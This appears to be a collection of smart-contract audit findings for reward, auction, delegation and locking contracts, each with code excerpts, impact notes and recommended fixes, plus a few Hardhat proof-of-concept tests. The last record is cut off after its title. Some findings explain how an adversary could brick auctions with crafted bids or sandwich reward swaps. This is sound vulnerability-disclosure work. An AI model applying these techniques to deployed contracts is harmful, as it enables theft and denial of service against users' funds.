When batch depositing to ProtocolRewards, the msg.value is expected to match the sum of the amounts array EXACTLY. The issue is that due to precision loss in Auction#_computeTotalRewards this call can be engineered to always revert, which completely bricks the auction process.\\nProtocolRewards.sol#L55-L65\\n```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n\\nWhen making a batch deposit the above method is called. As seen, the call will revert if the sum of amounts does not EXACTLY equal the msg.value.\\nAuction.sol#L474-L507\\n```\\n uint256 totalBPS = _founderRewardBps + referralRewardsBPS + builderRewardsBPS;\\n\\n // rest of code\\n\\n // Calulate total rewards\\n split.totalRewards = (_finalBidAmount * totalBPS) / BPS_PER_100_PERCENT;\\n\\n // rest of code\\n\\n // Initialize arrays\\n split.recipients = new address[](arraySize);\\n split.amounts = new uint256[](arraySize);\\n split.reasons = new bytes4[](arraySize);\\n\\n // Set builder reward\\n split.recipients[0] = builderRecipient;\\n split.amounts[0] = (_finalBidAmount * builderRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set referral reward\\n split.recipients[1] = _currentBidRefferal != address(0) ? _currentBidRefferal : builderRecipient;\\n split.amounts[1] = (_finalBidAmount * referralRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set founder reward if enabled\\n if (hasFounderReward) {\\n split.recipients[2] = founderReward.recipient;\\n split.amounts[2] = (_finalBidAmount * _founderRewardBps) / BPS_PER_100_PERCENT;\\n }\\n```\\n\\nThe sum of the percentages is used to determine the totalRewards. Meanwhile, the amounts are determined using the broken-out percentages of each. This leads to unequal precision loss, which can cause totalRewards to be off by a single wei, which in turn causes the batch deposit to revert and the auction to be bricked. Take the following example:\\nAssume a referral reward of 5% (500) and a builder reward of 5% (500) for a total of 10% (1000). To brick the contract the adversary can engineer their bid with specific final digits. In this example, take a bid ending in 19.\\n```\\nsplit.totalRewards = (19 * 1,000) / 100,000 = 190,000 / 100,000 = 1\\n\\nsplit.amounts[0] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\nsplit.amounts[1] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\n```\\n\\nHere we can see that the sum of amounts is not equal to totalRewards and the batch deposit will revert.\\nAuction.sol#L270-L273\\n```\\nif (split.totalRewards != 0) {\\n // Deposit rewards\\n rewardsManager.depositBatch{ value: split.totalRewards }(split.recipients, split.amounts, split.reasons, "");\\n}\\n```\\n\\nThe depositBatch call is placed in the very important _settleAuction function. This results in auctions that are permanently broken and can never be settled.
Instead of setting totalRewards with the sum of the percentages, increment it by each fee calculated. This way they will always match no matter what.
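A minimal sketch of the recommended change inside `_computeTotalRewards`, reusing the variable names quoted above; this illustrates the accumulation approach and is not the project's actual patch:\\n```\\n        // compute each reward first, then derive the total from the parts so they always match\\n        split.amounts[0] = (_finalBidAmount * builderRewardsBPS) / BPS_PER_100_PERCENT;\\n        split.amounts[1] = (_finalBidAmount * referralRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n        uint256 total = split.amounts[0] + split.amounts[1];\\n\\n        if (hasFounderReward) {\\n            split.amounts[2] = (_finalBidAmount * _founderRewardBps) / BPS_PER_100_PERCENT;\\n            total += split.amounts[2];\\n        }\\n\\n        split.totalRewards = total;\\n```\\nBecause `totalRewards` is now the exact sum of the individual amounts, the strict equality check in `ProtocolRewards.depositBatch` can no longer be made to fail by choosing a bid with awkward final digits.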
Auctions are completely bricked
```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n
Lowering the gauge weight can disrupt accounting, potentially leading to both excessive fund distribution and a loss of funds.
high
Similar issues were found by users 0xDetermination and bart1e in the Canto veRWA audit, which uses a similar gauge controller type.\\nWhen the _change_gauge_weight function is called, the `points_weight[addr][next_time].bias` and time_weight[addr] are updated - the slope is not.\\n```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n    # Change gauge weight\\n    # Only needed when testing in reality\\n    gauge_type: int128 = self.gauge_types_[addr] - 1\\n    old_gauge_weight: uint256 = self._get_weight(addr)\\n    type_weight: uint256 = self._get_type_weight(gauge_type)\\n    old_sum: uint256 = self._get_sum(gauge_type)\\n    _total_weight: uint256 = self._get_total()\\n    next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n    self.points_weight[addr][next_time].bias = weight\\n    self.time_weight[addr] = next_time\\n\\n    new_sum: uint256 = old_sum + weight - old_gauge_weight\\n    self.points_sum[gauge_type][next_time].bias = new_sum\\n    self.time_sum[gauge_type] = next_time\\n\\n    _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n    self.points_total[next_time] = _total_weight\\n    self.time_total = next_time\\n\\n    log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n\\nThe equation f(t) = c - m*t represents the gauge's decay equation before the weight is reduced. In this equation, `m` is the slope. After the weight is reduced by an amount `k` using the `change_gauge_weight` function, the equation becomes f(t) = c - k - m*t. The slope `m` remains unchanged, but the t-axis intercept changes from t1 = c/m to t2 = (c-k)/m.\\nSlope adjustments that should be applied to the global slope when the decay reaches 0 are stored in the `changes_sum` hashmap, and that hashmap is not affected by changes in gauge weight. Consequently, there's a time window t1 - t2 during which the earlier slope changes applied to the global state when users called the `vote_for_gauge_weights` function remain applied even though they should have been subtracted. This in turn creates a situation in which the global weight is less than the sum of the individual gauge weights, resulting in an accounting error.\\nSo, in the `CvgRewards` contract when the `writeStakingRewards` function invokes `_checkpoint`, which subsequently triggers the `gauge_relative_weight_writes` function for the relevant time period, the calculated relative weight becomes inflated, leading to an increase in the distributed rewards. If all available rewards are distributed before the entire array is processed, the remaining users will receive no rewards.\\nThe issue mainly arises when a gauge's weight has completely diminished to zero. This is certain to happen if a gauge with a non-zero bias, non-zero slope, and a t-intercept exceeding the current time is killed using the `kill_gauge` function.\\nAdditionally, decreasing a gauge's weight introduces inaccuracies in its decay equation, as is evident in the t-intercept.
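Concretely, with weight c, slope m and a reduction of k as above, the window during which the accounting drifts is:\\n```\\nt_1 = c / m          (old zero-crossing)\\nt_2 = (c - k) / m    (new zero-crossing)\\nt_1 - t_2 = k / m    (length of the mismatch window)\\n```\\nDuring that window the slope change scheduled for t_1 is still being applied to the global sum even though the gauge's own bias already reached zero at t_2, which is exactly the mismatch between the global weight and the sum of individual gauge weights described above.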
Disable weight reduction, or only allow reset to 0.
The way rewards are calculated is broken, leading to an uneven distribution of rewards, with some users receiving too much and others receiving nothing.
```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n
Tokens that are both bribes and StakeDao gauge rewards will cause loss of funds
high
When SdtStakingPositionService is pulling rewards and bribes from the buffer, the buffer will return a list of tokens and amounts owed. This list is used to set the rewards eligible for distribution. Since this list is never checked for duplicate tokens, a shared bribe and reward token would cause the token to show up twice in the list. The issue is that _sdtRewardsByCycle is set rather than incremented, which will cause the second occurrence of the token to overwrite the first and break accounting. The amount of the token received from the gauge reward that is overwritten will be lost forever.\\nIn L559 of SdtStakingPositionService it receives a list of tokens and amounts from the buffer.\\nSdtBuffer.sol#L90-L168\\n```\\n        ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n            processor,\\n            _processorRewardsPercentage\\n        );\\n\\n        uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n        ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n            rewardAmount + bribeTokens.length\\n        );\\n\\n        uint256 counter;\\n        address _processor = processor;\\n        for (uint256 j; j < rewardAmount; ) {\\n            IERC20 token = _gaugeAsset.reward_tokens(j);\\n            uint256 balance = token.balanceOf(address(this));\\n            if (balance != 0) {\\n                uint256 fullBalance = balance;\\n\\n                // rest of code\\n\\n                token.transfer(sdtRewardsReceiver, balance);\\n\\n                **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n                tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n            }\\n\\n            // rest of code\\n\\n        }\\n\\n        for (uint256 j; j < bribeTokens.length; ) {\\n            IERC20 token = bribeTokens[j].token;\\n            uint256 amount = bribeTokens[j].amount;\\n\\n            **@audit token and amount added directly with no check for duplicate token**\\n\\n            if (amount != 0) {\\n                tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n                // rest of code\\n\\n            }\\n```\\n\\nSdtBuffer#pullRewards returns a list of tokens that is a concatenated array of all bribe and reward tokens. There are no controls in place to remove duplicates from this list of tokens. This means that tokens that are both bribes and rewards will be duplicated in the list.\\nSdtStakingPositionService.sol#L561-L577\\n```\\n        for (uint256 i; i < _rewardAssets.length; ) {\\n            IERC20 _token = _rewardAssets[i].token;\\n            uint256 erc20Id = _tokenToId[_token];\\n            if (erc20Id == 0) {\\n                uint256 _numberOfSdtRewards = ++numberOfSdtRewards;\\n                _tokenToId[_token] = _numberOfSdtRewards;\\n                erc20Id = _numberOfSdtRewards;\\n            }\\n\\n            **@audit overwrites and doesn't increment causing duplicates to be lost** \\n\\n            _sdtRewardsByCycle[_cvgStakingCycle][erc20Id] = ICommonStruct.TokenAmount({\\n                token: _token,\\n                amount: _rewardAssets[i].amount\\n            });\\n            unchecked {\\n                ++i;\\n            }\\n        }\\n```\\n\\nWhen storing this list of rewards, it overwrites _sdtRewardsByCycle with the values from the returned array. This is where the problem arises, because duplicates will cause the second entry to overwrite the first entry. Since the first instance is overwritten, all funds in the first occurrence will be lost permanently.
Either sdtBuffer or SdtStakingPositionService should be updated to combine duplicate token entries and prevent overwriting.
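A minimal sketch of de-duplicating on the `SdtStakingPositionService` side by accumulating instead of overwriting; it mirrors the loop quoted above and is illustrative only:\\n```\\n        for (uint256 i; i < _rewardAssets.length; ) {\\n            IERC20 _token = _rewardAssets[i].token;\\n            uint256 erc20Id = _tokenToId[_token];\\n            if (erc20Id == 0) {\\n                uint256 _numberOfSdtRewards = ++numberOfSdtRewards;\\n                _tokenToId[_token] = _numberOfSdtRewards;\\n                erc20Id = _numberOfSdtRewards;\\n            }\\n\\n            // accumulate so a token that is both a bribe and a gauge reward keeps both amounts\\n            _sdtRewardsByCycle[_cvgStakingCycle][erc20Id] = ICommonStruct.TokenAmount({\\n                token: _token,\\n                amount: _sdtRewardsByCycle[_cvgStakingCycle][erc20Id].amount + _rewardAssets[i].amount\\n            });\\n            unchecked {\\n                ++i;\\n            }\\n        }\\n```\\nAlternatively, `SdtBuffer` could merge duplicate tokens before returning the array so the staking contract never sees the same token twice.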
Tokens that are both bribes and gauge rewards will cause funds to be lost forever
```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n
Delegation Limitation in Voting Power Management
medium
The mgCVG voting power delegation system is constrained by 2 hard limits, first on the number of tokens delegated to one user (maxTokenIdsDelegated = 25) and second on the number of delegatees for one token (maxMgDelegatees = 5). Once this limit is reached for a token, the token owner cannot modify the delegation percentage to an existing delegated user. This inflexibility can prevent efficient and dynamic management of delegated voting power.\\nObserve these lines:\\n```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, "INVALID_PERCENTAGE");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, "TOO_MUCH_DELEGATEES");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, "TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n```\\n\\nIf either `maxMgDelegatees` or `maxTokenIdsDelegated` is reached, delegation is no longer possible. The problem is that this single function is used to delegate, to update the percentage of a delegation, or to remove a delegation, but in cases where we already delegated to the maximum number of users (maxMgDelegatees) OR the user to whom we delegated has reached the maximum number of tokens that can be delegated to them (maxTokenIdsDelegated), an update or a removal of the delegation is no longer possible.\\n6 scenarios are possible:\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and chooses to delegate 10% to him. Bob gets 2 other people delegating their tokens to him, Alice wants to increase the power delegated to Bob to 50% but she cannot due to Bob reaching `maxTokenIdsDelegated`\\n`maxTokenIdsDelegated` is set to 25, Alice is the 10th to delegate her voting power to Bob and chooses to delegate 10%, the DAO decreases `maxTokenIdsDelegated` to 3, Alice wants to increase the power delegated to Bob to 50%, but she cannot due to this\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and chooses to delegate 90%. Bob gets 2 other people delegating their tokens to him, Alice wants to only remove the power delegated to Bob using this function, but she cannot due to this\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob, Charly and Donald by 20% each, Alice reaches `maxMgDelegatees` and she cannot update her voting power for any of Bob, Charly or Donald\\n`maxMgDelegatees` is set to 5, Alice delegates her voting power to Bob, Charly and Donald by 20% each, the DAO decreases maxMgDelegatees to 3. 
Alice cannot update or remove her voting power delegated to any of Bob,Charly and Donald\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice wants to only remove her delegation to Bob but she reached `maxMgDelegatees` so she cannot only remove her delegation to Bob\\nA function is provided to remove all user to who we delegated but this function cannot be used as a solution to this problem due to 2 things :\\nIt's clearly not intended to do an update of voting power percentage by first removing all delegation we did because `delegateMgCvg()` is clearly defined to allow to delegate OR to remove one delegation OR to update percentage of delegation but in some cases it's impossible which is not acceptable\\nif Alice wants to update it's percentage delegated to Bob , she would have to remove all her delegatees and would take the risk that someone is faster than her and delegate to Bob before her, making Bob reaches `maxTokenIdsDelegated` and would render impossible for Alice to re-delegate to Bob\\nPOC\\nYou can add it to test/ut/delegation/balance-delegation.spec.ts :\\n```\\nit("maxTokenIdsDelegated is reached => Cannot update percentage of delegate", async function () {\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n \\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith("TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n });\\n it("maxTokenIdsDelegated IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3); \\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith("TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n });\\n it("maxMgDelegatees : TRY TO UPDATE PERCENTAGE DELEGATED TO A USER IF WE ALREADY REACH maxMgDelegatees", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(3);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 30);\\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await 
expect(txFail).to.be.revertedWith("TOO_MUCH_DELEGATEES");\\n });\\n it("maxMgDelegatees : maxMgDelegatees IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(5);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(5);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 10);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(2);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(2);\\n\\n const txFail2 = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 50);\\n await expect(txFail2).to.be.revertedWith("TOO_MUCH_DELEGATEES");\\n });\\n```\\n
Issue Delegation Limitation in Voting Power Management\\nSeparate new delegations from updates: implement logic that differentiates between adding a new delegatee and updating an existing delegation, so that updates to existing delegations remain possible even if the maximum number of delegatees or delegated tokens is reached
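A minimal sketch of the suggested differentiation; `_isMgDelegatee` is a hypothetical view helper (not in the current contract) that reports whether `_to` already has a delegation from `_tokenId`, and only the limit checks change:\\n```\\n    function delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n        require(_percentage <= 100, "INVALID_PERCENTAGE");\\n\\n        bool isExistingDelegatee = _isMgDelegatee(_tokenId, _to); // hypothetical helper\\n\\n        // only enforce the caps when a brand new delegation is created,\\n        // so updates and removals keep working after the limits are reached\\n        if (!isExistingDelegatee) {\\n            require(delegatedMgCvg[_tokenId].length < maxMgDelegatees, "TOO_MUCH_DELEGATEES");\\n            require(mgCvgDelegatees[_to].length < maxTokenIdsDelegated, "TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n        }\\n\\n        // ... existing percentage bookkeeping unchanged ...\\n    }\\n```\\n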
In some cases it is impossible to update a delegated percentage or to remove only one delegation, forcing users to remove all their voting power delegations and take the risk that someone delegates to their old delegatees faster than them and reaches the delegation threshold, making it impossible for them to re-delegate
```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, "INVALID_PERCENTAGE");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, "TOO_MUCH_DELEGATEES");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, "TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n```\\n
cvgControlTower and veCVG lock timing will be different and lead to yield loss scenarios
medium
When creating a locked CVG position, there are two more or less independent locks that are created. The first is in lockingPositionService and the other is in veCVG. LockingPositionService operates on cycles (which are not of fixed length) while veCVG always rounds down to the absolute nearest week. The disparity between these two accounting mechanisms leads to a conflicting scenario in which the lock on LockingPositionService can be expired while the lock on veCVG isn't (and vice versa). Additionally, tokens with expired locks on LockingPositionService cannot be extended. The result is that the token is expired but can't be withdrawn: the expired token must wait to be unstaked and then restaked, causing loss of user yield and voting power while the token is DOS'd.\\nCycles operate using block.timestamp when setting lastUpdateTime on the new cycle in L345. It also requires that at least 7 days have passed since this update to roll the cycle forward in L205. The result is that the cycle can never be exactly 7 days long and the start/end of the cycle will constantly fluctuate.\\nMeanwhile when veCVG is calculating the unlock time it uses the week rounded down as shown in L328.\\nWe can demonstrate with an example:\\nAssume the first CVG cycle is started at block.timestamp == 1,000,000. This means our first cycle ends at 1,604,800. A user deposits for a single cycle at 1,400,000. A lock is created for cycle 2 which will unlock at 2,209,600.\\nThe lock on veCVG does not match this though. Instead its calculation will yield:\\n```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n\\nAs seen, these are mismatched and the token won't be withdrawable until much after it should be, due to the check in veCVG L404.\\nThis DOS will prevent the expired lock from being unstaked and restaked, which causes loss of yield.\\nThe opposite issue can also occur. For each cycle that is slightly longer than expected, the veCVG lock will fall further and further behind the cycle lock on lockingPositionService. This can also cause a DOS and yield loss because it could prevent users from extending valid locks due to the checks in L367 of veCVG.\\nAn example of this:\\nAssume a user locks for 96 weeks (58,060,800). Over the course of that period, it takes an average of 2 hours between the end of each cycle and when the cycle is rolled over. This effectively extends our cycle time from 604,800 to 612,000 (+7200). Now after 95 cycles, the user attempts to increase their lock duration. veCVG and lockingPositionService will now be completely out of sync:\\nAfter 95 cycles the current time would be:\\n```\\n612,000 * 95 = 58,140,000\\n```\\n\\nWhereas the veCVG lock ended at:\\n```\\n604,800 * 96 = 58,060,800\\n```\\n\\nAccording to veCVG the position was unlocked at 58,060,800 and therefore increasing the lock time will revert due to L367.\\nThe result is another DOS that will cause the user loss of yield. During this time the user would also be excluded from taking part in any votes since their veCVG lock is expired.
I would recommend against using block.timestamp for CVG cycles, instead using an absolute measurement like veCVG uses.
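A minimal sketch of the absolute-time approach, mirroring veCVG's week rounding; the names are illustrative, not the existing CvgControlTower code:\\n```\\n    uint256 constant WEEK = 604_800;\\n\\n    // every cycle boundary is an exact multiple of a week, matching veCVG's rounding,\\n    // so the lock end computed from cycles and the one computed by veCVG stay in sync\\n    function currentCycleStart() internal view returns (uint256) {\\n        return (block.timestamp / WEEK) * WEEK;\\n    }\\n\\n    function cycleEnd(uint256 cycleStart) internal pure returns (uint256) {\\n        return cycleStart + WEEK;\\n    }\\n```\\n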
Unlock DOS that causes loss of yield to the user
```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n
SdtRewardReceiver#_withdrawRewards has incorrect slippage protection and withdraws can be sandwiched
medium
The _min_dy parameter of poolCvgSDT.exchange is set via the poolCvgSDT.get_dy method. The problem with this is that get_dy is a relative output that is computed at runtime. This means that no matter the state of the pool, this slippage check will never work.\\nSdtRewardReceiver.sol#L229-L236\\n```\\n        if (isMint) {\\n            /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n            cvgSdt.mint(receiver, rewardAmount);\\n        } else {\\n            ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n            /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n            _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n        }\\n```\\n\\nWhen swapping from SDT to cvgSDT, get_dy is used to set _min_dy inside exchange. The issue is that get_dy is the CURRENT amount that would be received when swapping as shown below:\\n```\\n@view\\n@external\\ndef get_dy(i: int128, j: int128, dx: uint256) -> uint256:\\n    """\\n    @notice Calculate the current output dy given input dx\\n    @dev Index values can be found via the `coins` public getter method\\n    @param i Index value for the coin to send\\n    @param j Index valie of the coin to recieve\\n    @param dx Amount of `i` being exchanged\\n    @return Amount of `j` predicted\\n    """\\n    rates: uint256[N_COINS] = self.rate_multipliers\\n    xp: uint256[N_COINS] = self._xp_mem(rates, self.balances)\\n\\n    x: uint256 = xp[i] + (dx * rates[i] / PRECISION)\\n    y: uint256 = self.get_y(i, j, x, xp, 0, 0)\\n    dy: uint256 = xp[j] - y - 1\\n    fee: uint256 = self.fee * dy / FEE_DENOMINATOR\\n    return (dy - fee) * PRECISION / rates[j]\\n```\\n\\nThe return value is EXACTLY the result of a regular swap, which is where the problem is. There is no way that the exchange call can ever revert. Assume the user is swapping because the current exchange ratio is 1:1.5. Now assume their withdrawal is sandwich attacked. The ratio is changed to 1:0.5, which is much lower than expected. When get_dy is called it will simulate the swap and return a ratio of 1:0.5. This in turn doesn't protect the user at all and their swap will execute at the poor price.
Allow the user to set _min_dy directly so they can guarantee they get the amount they want
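A minimal sketch of passing the bound through from the caller; the extra `_minCvgSdtOut` parameter is illustrative and would have to be threaded through the external claim function's signature:\\n```\\n        if (isMint) {\\n            /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n            cvgSdt.mint(receiver, rewardAmount);\\n        } else {\\n            // _minCvgSdtOut is chosen by the user off-chain, so a sandwich that moves the\\n            // pool past the user's tolerance makes the swap revert instead of executing badly\\n            poolCvgSDT.exchange(0, 1, rewardAmount, _minCvgSdtOut, receiver);\\n        }\\n```\\n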
SDT rewards will be sandwiched and can lose the entire balance
```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n
Division differences can result in excess rewards for some users and a revert when others claim treasury yield
medium
Different orderings of calculations are used to compute `ysTotal` in different situations. This causes the tracked totalShares to be less than the claimable amount of shares.\\n`ysTotal` is calculated differently when adding to `totalSuppliesTracking` and when computing `balanceOfYsCvgAt`. When adding to `totalSuppliesTracking`, the calculation of `ysTotal` is as follows:\\n```\\n        uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n        uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n\\nIn `balanceOfYsCvgAt`, `ysTotal` is calculated as follows:\\n```\\n        uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n\\nThis difference allows the `balanceOfYsCvgAt` to be greater than what is added to `totalSuppliesTracking`.\\nPOC\\n```\\n startCycle 357\\n endCycle 420\\n lockDuration 63\\n amount 2\\n ysPercentage 80\\n```\\n\\nCalculation in `totalSuppliesTracking` gives:\\n```\\n        uint256 cvgLockAmount = (2 * 80) / 100; == 1\\n        uint256 ysTotal = (63 * 1) / 96; == 0\\n```\\n\\nCalculation in `balanceOfYsCvgAt` gives:\\n```\\n        uint256 ysTotal = ((63 * 2 * 80) / 100) / 96; == 10080 / 100 / 96 == 1\\n```\\n\\nExample Scenario\\nAlice, Bob and Jake lock CVG for 1 TDE and obtain a rounded-up `balanceOfYsCvgAt`. A user who is aware of this issue can exploit it further by using `increaseLockAmount` with small amount values, by which the total difference between the user's calculated `balanceOfYsCvgAt` and the accounted amount in `totalSuppliesTracking` can be increased. Bob and Jake claim the reward at the end of the reward cycle. When Alice attempts to claim rewards, it reverts since there is not enough reward to be sent.
Perform the same calculation in both places\\n```\\n+++ uint256 _ysTotal = (_extension.endCycle - _extension.cycleId)* ((_extension.cvgLocked * _lockingPosition.ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n--- uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n
This breaks the shares accounting of the treasury rewards. Some users will get more than the actual intended rewards, while the last withdrawals will result in a revert
```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n
Different spot prices used during the comparison
high
